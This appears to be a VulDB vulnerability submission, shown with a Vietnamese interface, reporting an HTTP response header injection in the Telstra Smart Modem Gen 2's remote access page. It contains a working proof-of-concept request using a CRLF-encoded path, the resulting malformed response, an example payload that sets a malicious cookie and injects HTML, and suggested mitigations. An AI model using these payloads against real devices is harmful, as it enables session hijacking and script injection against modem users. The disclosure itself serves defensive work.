Gửi #480045: Telstra Smart Modem Generation 2 HTTP Response Header Injectionthông tin

tiêu đềTelstra Smart Modem Generation 2 HTTP Response Header Injection
Mô tảA vulnerability was recently discovered in the HTTP(S) remote access webpage for the Telstra Smart Modem Gen 2. This vulnerability allows for HTTP Response Header Injection, giving attackers the ability to manipulate HTTP headers and potentially inject malicious payloads into server responses. The issue is caused by user-supplied data being unsafely copied into the Content-Disposition response header without proper validation or sanitization. This vulnerability was demonstrated by sending a specially crafted HTTP GET request to the server, targeting the robots.txt resource with a malicious payload embedded in the URL path: """ GET /robots.txtcy4y9%0d%0ai3o0z HTTP/1.1 Host: *.***.**.*** Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36 Connection: close Cache-Control: max-age=0 """ This request appends the payload 'cy4y9%0d%0ai3o0z' to the resource path in the URL. The %0d%0a sequence breaks out of the expected header structure, allowing for the injection of new headers or manipulation of the response body. The server then processed the request and returned the following malformed response: """ HTTP/1.1 302 Found Server: nginx/1.15.10 Date: Mon, 13 Jan 2025 04:30:25 GMT Content-Type: text/html Content-Length: 0 Connection: close Content-Disposition: attachment; filename=robots.txtcy4y9 i3o0z: Location: /relogin.htm X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Frame-Options: SAMEORIGIN Access-Control-Allow-Origin: http://mymodem.gateway:85 """ In this response, the Content-Disposition header is constructed with the user-supplied value robots.txtcy4y9, but the %0d%0a sequence terminates this header prematurely. This results in the creation of a new, invalid header: 'i3o0z:'. By including additional payloads beyond the %0d%0a, an attacker could inject arbitrary HTTP headers or even initiate the response body with crafted content. For example, inserting %0d%0aSet-Cookie: sessionid=malicious%0d%0a%0d%0a<html> could set a malicious cookie and inject HTML or JavaScript into the response body. Attempts have been made to contact Telstra Support about this vulnerability, however no reply was received. Strategies to mitigate this vulnerability have been listed below: - Confirm that all user-supplied input is sanitized before being incorporated into HTTP headers. - Reject all input that contains control characters or other unsafe combinations. - Encode user input to neutralize special characters before including it in headers.
Nguồn⚠️ https://github.com/bloodbile/Telstra-RHI
Người dùng
 grunge (UID 80129)
Đệ trình13/01/2025 07:25 (cách đây 1 Năm)
Kiểm duyệt24/01/2025 10:22 (11 days later)
Trạng tháiđược chấp nhận
Mục VulDB293223 [Telstra Smart Modem Gen 2 đến 20250115 HTTP Header Content-Disposition nâng cao đặc quyền]
điểm20

Do you want to use VulDB in your project?

Use the official API to access entries easily!